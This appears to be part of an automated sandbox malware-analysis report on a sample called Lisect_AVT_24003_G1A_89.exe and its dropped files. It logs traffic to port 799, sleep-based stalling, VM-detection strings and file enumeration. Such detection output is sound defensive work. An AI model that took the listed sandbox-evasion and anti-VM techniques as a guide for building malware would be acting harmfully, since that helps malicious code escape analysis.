Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 799

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\ProgramData\MPGPH131\MPGPH131.exe

Stalling execution: Execution stalls by calling Sleep

graph_7-22918

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Window / User API: threadDelayed 966	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Window / User API: threadDelayed 3740	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Window / User API: threadDelayed 1341	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Window / User API: threadDelayed 2105	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 4125	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 4041	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 4028	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 4134	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 5226	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 2510	Jump to behavior

Source: C:\ProgramData\MPGPH131\MPGPH131.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_7-22922

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_1-1054
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_7-22989

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

API coverage: 9.7 %

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5804	Thread sleep count: 966 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480	Thread sleep count: 3740 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480	Thread sleep time: -3740000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5340	Thread sleep count: 1341 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5340	Thread sleep time: -1341000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5804	Thread sleep count: 234 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 4068	Thread sleep count: 251 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480	Thread sleep count: 2105 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480	Thread sleep time: -2105000s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1408	Thread sleep count: 4125 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1408	Thread sleep time: -4125000s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4432	Thread sleep count: 92 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1372	Thread sleep count: 4041 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1372	Thread sleep time: -4041000s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4432	Thread sleep count: 233 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3812	Thread sleep count: 235 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 616	Thread sleep count: 4028 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 616	Thread sleep time: -4028000s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3624	Thread sleep count: 90 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2556	Thread sleep count: 4134 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2556	Thread sleep time: -4134000s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3624	Thread sleep count: 234 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3660	Thread sleep count: 235 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2452	Thread sleep count: 344 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6096	Thread sleep count: 5226 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6096	Thread sleep time: -5226000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2604	Thread sleep count: 2510 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2604	Thread sleep time: -2510000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2452	Thread sleep count: 273 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 5612	Thread sleep count: 267 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Code function: 1_2_00E61718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00E61754h

1_2_00E61718

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_0108B3B5 recv,FindFirstFileExW,GetLastError,	0_2_0108B3B5
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_01898D7B FindFirstFileA,	0_2_01898D7B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_0108B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	0_2_0108B41B
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Code function: 1_2_00E629E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	1_2_00E629E2
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0064B3B5 recv,FindFirstFileExW,GetLastError,	7_2_0064B3B5
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	7_2_0064B41B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0064B3B5 recv,FindFirstFileExW,GetLastError,	8_2_0064B3B5
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	8_2_0064B41B

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Code function: 1_2_00E62B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00E62B8C

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, 00000008.00000002.4459782824.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}2c
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, 00000008.00000002.4459782824.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}l\
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: vmware
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
